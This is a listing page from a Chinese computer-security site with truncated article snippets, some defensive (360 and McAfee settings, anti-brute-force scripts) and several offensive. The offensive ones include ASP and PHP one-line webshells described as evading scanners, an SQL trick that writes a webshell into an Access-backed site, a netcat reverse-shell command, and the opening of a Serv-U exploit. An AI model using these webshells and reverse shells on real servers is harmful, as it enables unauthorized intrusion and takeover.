内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

  • 通过MySQL系统得到cmdshell的方法与防范04月05日

    1、连接到对方MYSQL 服务器 mysql -u root -h 192.168.0.1 mysql.exe 这个程序在你安装了MYSQL的的BIN目录中 2、让我们来看看服务器中有些什么数据库 mysqlshow databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用

    Tags:黑客攻击与防范
  • PHP 双字节、宽字节编码漏洞04月05日

    代码如下: 还是用一个demo.php显示效果,代码如下: 复制代码 代码如下: ?php header("Content-Type:text/html;Charset=gb2312"); echo $_GET["str"]; //受污染的,但还有gpc echi "br/"; echo addslashes($_GET["str"]); //调用addslashes函数过滤有害字符

    Tags:脚本攻击与防范
  • 360安全卫士360蓝屏修复怎么开启04月05日

    现在,很多人在使用电脑时,都会遇到蓝屏的情况。这时候,360安全卫士可以帮你解决问题。不过,大多时候,360蓝屏修复都是关闭的。那么,360安全卫士360蓝屏修复怎么开启?今天,就和小编一起来看看吧。 1、打开360安全卫士 2、点击左下角的查杀修复 3、然后

    Tags:电脑安全知识安全设置技巧
  • 手工注入拿到管理员密码登陆后台 图文04月03日

    入侵是指未授权的非法进入,而安全检测是授权的检测!对自己的程序进行测试,当然是调试或者是安全检测了!这次就把自己对程序的测试过程发出来!因为是利用程序中的漏洞,在这利用的是SQL注入!我们要进行SQL注入!首先要找注入点了 我们要对这个程序进行测

    Tags:黑客攻击与防范
  • Linux实用一句话&脚本介绍04月03日

    1、查看谁破解你的ssh cat /var/log/auth.log | grep pam_unix(sshd:auth): authentication failure; | cut -f14 -d\ | cut -d'=' -f2 | sort | uniq -c | sort -nr 2、查看当前网络连接数 netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S

    Tags:脚本攻击与防范
  • 360安全卫士测网速方法04月03日

    现在,很多人都想知道自己的电脑的网速到底好不好。那么, 360安全卫士怎么测网速?那么,就和小编一起来看看360安全卫士测网速方法吧。 1、点击360安全卫士7.5Beta版高级工具按钮,就能看到网速测试器的图标。 2、点一下即可自动测试当前网络环境下的下载速

    Tags:电脑安全知识安全设置技巧
  • serv_u提权记录: 530 Not logged in, home directory does not exist04月01日

    仔细看下面的图片,发现什么了吗。SU的提权可以溢出(如何防止溢出电脑高手网技术团队帮您解决服务器安全问题),但是出错了。不是限制了cmd命令,注意 Recv: 530 Not logged in, home directory does not exist. 网上解释是: 一般在用户登录时出现:530 Not

    Tags:黑客攻击与防范
  • 史上最全的各个脚本的一句话木马04月01日

    以下这个ASP一句话 %If Request(1) Then ExecuteGlobal(Request(1))% 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的最底部不会出错, ?php ($_=@$_GET[2]).@$_($_POST[1])? 上面这句是防杀防扫的!网上很少人用!可以插在网页任何ASP文件的

    Tags:脚本攻击与防范
  • mcafee 企业版 8.0i设置教程04月01日

    首先打开麦咖啡的控制台,右击任务栏的图标或者从开始菜单都可以打开,可以看到以下的界面 下面按照控制台中的顺序一个一个来说 访问保护 这里,就是麦咖啡的简单的网络防火墙功能,可以设定让麦咖啡来阻止相应的端口,比如阻止了25端口以后,就可以禁止某些

    Tags:杀毒知识防毒知识
  • 360安全卫士恢复数据方法04月01日

    很多人都在使用360安全卫士,而有人在反映说,有时候会误删一些数据,但是不知道怎么恢复。今天,小编就来跟大家分享360安全卫士恢复数据方法。 1、在360安全卫士找到功能大全区域,点击更多选项,在功能大全界面下,找到文件恢复图标。 2、 打开360文件恢复

    Tags:电脑安全知识安全设置技巧
  • 网站拿webshell一技巧03月30日

    一个存在备份的页面,但是一般直接访问的话都会出现 看到系统有个广告位的地方,还可以进行url地址的提交,于是就可以把备份的地址写进去即可 之后再管理广告位,直接点击那个URL地址,即可看到我们熟悉的备份页面了,O(_)O哈哈~ form:Zahirll

    Tags:黑客攻击与防范
  • serv-u最新通杀所有版本0day asp代码03月30日

    要不容易出错的。 复制代码 代码如下: style type="text/css" !-- body,td,th { font-size: 12px; } -- /style % Function httpopen(neirong,fangshi,dizhi,refer,cookie) set Http=server.createobject("Microsoft.XMLHTTP") Http.open fangshi,dizhi,false

    Tags:脚本攻击与防范
  • McAfee 打造超安全的Web站点目录的图文教程03月30日

    殊不知此站大有文章,虽手握服务器权限,但仍对Web目录无可奈何.在下一向积极好学,碰到如此变态之服务器,必然是要扒皮抽筋找其原因..首先查看目录权限,发现并无什么特别之处,更何况我现在是管理员权限,应该是畅通无阻,看来问题不是出在权限的设置上.于是苦思冥

    Tags:杀毒知识防毒知识
  • ACCESS数据库后台sql语句执行导shell的方法03月28日

    需要什么条件,语句又是什么?网上翻不到资料。麻烦各位。 答: create table cmd (a varchar(50)) insert into cmd (a) values ('%execute request(a)%') select * into [a] in 'f:\host\qhdyxt\web\a.asp;.xls' 'excel 4.0;' from cmd drop table cmd 解释

    Tags:黑客攻击与防范
  • Linux下防御/减轻DDOS攻击的方法03月28日

    今天要说的就是一款能够自动屏蔽DDOS攻击者IP的软件:DDoS deflate。 DDoS deflate介绍 DDoS deflate是一款免费的用来防御和减轻DDoS攻击的脚本。它通过netstat监测跟踪创建大量网络连接的IP地址,在检测到某个结点超过预设的限 制时,该程序会通过APF或IPTAB

    Tags:脚本攻击与防范
  • 麦咖啡(mcafee) 冬虫草服务器系列 防止窜改用户账户的设置03月28日

    大家都知道windows账户是放在注册表这里的HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account 所以只要对这里进行控制就可以达到禁止窜改用户的目的 很多朋友只要对guest账户做禁止就用下面这个 他在窜改用户,虽然没有找到他是什么方式改的.但是我想你要白忙了 还想

    Tags:杀毒知识防毒知识
  • webshell下提权两个小技巧分享03月27日

    webshell提权小技巧 cmd路径: c:\windows\temp\cmd.exe nc也在同目录下 例如反弹cmdshell: c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe 通常都不会成功。 而直接在 cmd路径上 输入 c:\windows\temp\nc.exe 命令输入 -vv ip 999 -e c:\wi

    Tags:黑客攻击与防范
  • webshell下执行CMD的小技巧分享03月27日

    在webshell下执行CMD,按照常规: path:c:\windows\temp\cmd.exe 查用户: Command: /c net user 这个情况是system32目录的net.exe 你能调用到。 要是调用不到,只能传文件到执行目录。 假设更cmd在同一个目录,c:\\windows\\temp\\net.exe 那就是 c:\window

    Tags:黑客攻击与防范
  • SC.exe在渗透中的妙用03月27日

    1、利用Sc getkeyname来获取服务的名字 首先我们可以利用 net start 来得到系统中的服务显示名称 然后我们利用 sc getkeyname 来得到服务的真实名称 这样我们就得到了服务的真实名称,然后我们利用 net stop 服务名 来停止服务 2、利用sc qc来获取服务的运行

    Tags:黑客攻击与防范
  • 脚本防止SSH和vsftpd暴力破解的代码分享03月27日

    我随便看了看/var/log/secure日志,显示如下: 复制代码 代码如下: 118.33.110.52=2834 119.145.254.77=37 121.254.179.199=226 121.88.250.243=35 200.29.110.104=168 202.78.173.199=250 222.221.2.210=373 这里面除了119.145.254.77和121.88.250.243是正常

    Tags:脚本攻击与防范

Copyright © 2002-2016 dngsw.cn 电脑高手网 版权所有

粤ICP备13005586号-3